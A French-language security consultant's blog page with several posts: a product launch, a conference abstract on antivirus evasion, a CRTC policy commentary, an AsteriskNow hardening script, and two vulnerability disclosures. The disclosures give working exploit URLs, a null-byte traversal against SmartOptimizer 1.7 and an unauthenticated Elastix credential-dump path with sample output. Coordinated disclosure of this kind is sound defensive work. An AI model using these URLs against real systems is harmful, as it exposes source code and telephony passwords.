actualité

Lancement en mode béta de catégo.info

C’est avec plaisir que notre entreprise rend accessible en mode invitation notre plate-forme de gestion de la sécurité catégo.info. Ce produit à été développé pour aider les organisations à gérer de façon dynamique leur sécurité de l’information, notamment leur catégorisation, les analyses de risques et la rédaction de plan directeur.

Je tiens à remercier mon équipe, ainsi que mes clients qui ont participé au développement de cette plate-forme en ligne.

Pour plus d’information visitez decouvrez.catego.info ou sur catego.info

Conférence hackfest 2013 – Techniques d’évasion antivirale

Je serai conférencier pour l’édition 2013 du hackfest avec conférence sur les techniques d’évasion antivirale. Plus de détails à venir. Entre-temps, visiter le site du hackfest pour plus d’informations.

Techniques d’évasion antivirale

Pour chaque millier de variantes de virus, certains réussissent à survivre et à prospérer. Comment ont-ils passé à travers les mailles des filets et comment un attaquant pourrait s’en inspirer ?

Au cours des dernières années l’arsenal des solutions antivirales a évolué : sandboxing, systèmes de réputation, solutions cloud, analyse comportementale, etc. Mais pour chaque nouvelles défenses, des nouveaux vecteurs d’attaques ont fait leurs apparitions.

L’objectif de cette conférence est de comprendre comment ces mécanismes fonctionnent en détail analyser leurs vulnérabilités, et voir comment un attaquant peut les exploiter à son avantage et les utiliser pour contourner et affaiblir la sécurité d’une organisation.

En espérant vous y voir en grand nombre !

Rehausser sa sécurité informatique en 10 étapes

C’est avec plaisir que vous pouvez maintenant consulter mon article « Rehausser sa sécurité informatique en 10 étapes » paru dans la revue Via Bitume du mois de Juin.

Pour une entreprise, il est important de protéger ses données. Malheureusement pour plusieurs entreprises, un incident informatique est nécessaire avant de rehausser leur sécurité. Pourtant, les informations telles que les plans, propriétés intellectuelles, correspondances d’affaires et la comptabilité sont nécessaires au bon fonctionnement de l’entreprise. La sécurité de l’information consiste à garantir la confidentialité, l’intégrité et la disponibilité de ces données. Par où une entreprise doit-elle commencer? Voici dix éléments importants qui vous permettront d’avoir une sécurité à toute épreuve!

(suite…)

Implication dans XODA

J’ai décidé de me joindre à l’équipe de développement du logiciel libre XODA. C’est un logiciel simple permettant la gestion l’accès à des documents en lignes. La version 0.3.0 devrait sortir sous peu, plusieurs options additionnels est une sécurité accrue.

Bonne année 2011

J’en profite pour souhaiter à tous une bonne année 2011 !

Proposition de conférence pour Confoo 2011

À la suite de ma conférence de l’année dernière pour confoo, j’ai décidé de remettre l’expérience et de proposer une conférence pour l’édition 2011. Cette année j’ai soumis une proposition en lien avec la santé 2.0, la sécurité et les logiciels libres…

[MEDS-2010-5] Injection de NULL dans SmartOptimizer

Voici un avis de sécurité pour SmartOptimizer 1.7 et précédente. Une vulnérabilité permet des accès à des types de fichiers non autorisées (exemple code source des applications) en utilisant un null byte (%00) pour contourner la vérification des extensions valides. L’exploitation est très simple :

smartoptimizer/index.php?../index.php%00.js

Le développeur de ce logiciel à intégré un correctif, ainsi la version 1.8 corrige cette vulnérabilité et est disponible à l’adresse suivante : http://farhadi.ir/works/smartoptimizer

Publication de vulnérabilité : Elastix unsecure extensions configuration download (MEDS-2010-03)

Bonjour,

Voici un rapport de vulnérabilité pour la distribution Elastix, ça fait très longtemps que le fournisseur a été notifié, mais le fournisseur désirait attendre la version 2.0 d’Elastix avant la publication de cette vulnérabilité ne soit publiée (le correctif a été intégré dans la revision 1550 d’Elastix).  Pour ceux qui ont assisté à ma conférence à Confoo 2010, cette vulnérabilité avait servit d’exemple pour démontrer que parfois une simple erreur peut causer bien des problèmes !

Bonne lecture !

Advisory: MEDS-2010-03 - Elastix unsecure extensions configuration download
Release Date: 2010-01-13
Author: Francois Harvey, gestion medsecure (francois.harvey at medsecure dot ca) - http://medsecure.ca
Application: Elastix 1.6.X, Elastix 2 (Beta), Fixed in 2.0
Severity: High
Risk: High
Vendor Status: notified 2010-01-13, Fixed in the Last Release (http://elastix.svn.sourceforge.net/viewvc/elastix?view=revision&revision=1550)

OVERVIEW

"Elastix is an appliance software that integrates the best tools available for Asterisk-based PBXs into a single, easy-to-use interface. It also adds its own set of utilities and allows for the creation of third party modules to make it the best software package available for open source telephony."

VULNERABILITY

Elastix have a script to dump the extensions configuration (with both login & password), the script download_csv.php is not protected by ACL, so everybody can call this script.

EXPLOIT 

https://x.x.x.x/modules/extensions_batch/libs/download_csv.php [^]

----------------------
Display Name,"User Extension","Direct DID","Outbound CID","Call Waiting","Secret","Voicemail Status","Voicemail Password","VM Email Address","VM Pager Email Address","VM Options","VM Email Attachment","VM Play CID","VM Play Envelope","VM Delete Vmail","Context"

test,"123","","","DISABLED","my_secret_password","disable","","","","","no","no","no","no","from-internal"
----------------------

SOLUTION
Fixed by the Elastix Team.  (http://elastix.svn.sourceforge.net/viewvc/elastix?view=revision&revision=1550)

Décision du CRTC sur la concurrence des services Internet

Aujourd’hui, le CRTC rendait public certaines décisions concernant la concurrence dans les services internet soit la « Politique réglementaire de télécom CRTC 2010-632 », j’ai remarqué aucun article dans les médias francophones ( il faut croire qu’une décision du CRTC c’est moins intéressant que la commission Bastarache).

De façon générale, la décision est satisfaisante, elle:

  • permet aux fournisseurs de services indépendants d’offrir des vitesses équivalentes aux gros joueurs;
  • facilite l’accès aux technologies utilisant le câble (J’espère que cela permettra à des services tels que SpeedCable d’être plus compétitifs);
  • offre des accès compétitifs aux nouveaux réseaux tels que la fibre (si le prix coutant sur lequel se base la tarification n’est pas gonflé artificielement par les gros joueurs).

Par contre, je partage l’avis du conseiller Timothy Denton sur le fait que le CRTC aurait pu aller plus loin dans les possibilités de contrôle et de gestion de trafic par les fournisseurs indépendants.  Effectivement, peu de FAI offre des services Internet adaptés à des micro-marchés, par contre c’est un marché qui pourrait stimuler la diversité des offres de connectivité Internet et il est dommage que la règlementation n’aie pas été adapté en ce sens.

Par exemple, au Royaume-Uni, l’entreprise Demon, offre un service optimisé (Demon Game Pro) pour les joueurs via de la qualité de service et des liens directs avec certains fournisseurs de jeux en ligne.  Il va s’en dire que ses offres devraient être fait dans un contexte de « net neutrality » (accès équitable) c’est-à-dire sans réduire la qualité des services des compétiteurs.

<ironie>C’est dommage, imaginez un fournisseur conforme au rfc3514, offrant une sécurité intégrée au niveau IP.  C’est encore plus efficace que les trousse de sécurité vendus par certains fournisseurs.</ironie>

La décision complète est disponible à l’adresse suivante : http://www.crtc.gc.ca/fra/archive/2010/2010-632.htm

Securité sous AsteriskNow

Dans le monde de la téléphonie open source utilisant Asterisk, trois distributions majeures sont basées sur CentOS sont disponible : Trixbox, Elastix et AsteriskNow, j’ai plusieurs réserves envers la première (sécurité très discutable…), beaucoup moins pour la seconde et très peu pour la dernière qui est ma favorite dans le cadre de déploiement de téléphonie.

Malheureusement, favorite ne veut pas dire parfaite :) Surtout lorsque l’aspect sécurité passe avant celui des fonctionnalités car un des problèmes des distributions linux spécialisés est le partage des configurations sensibles (mots de passe, utilisateur, etc.) de façon générique.

C’est dans ce contexte j’ai publié un script dont l’objectif est d’automatiser un premier niveau de sécurité sous la distribution AsteriskNow : Changement des mots de passes par défault, sécurité du mode console, déconnexion automatique, etc… Ce script ne remplace pas un durcissement en profondeur adapté au type de déploiement requis, mais offre un niveau de sécurité minimal.

Pour plus de détail, visitez la page du script en question : http://medsecure.ca/produits/asterisknow-hardeningbootstraping-script/ (anglais)

Haut de page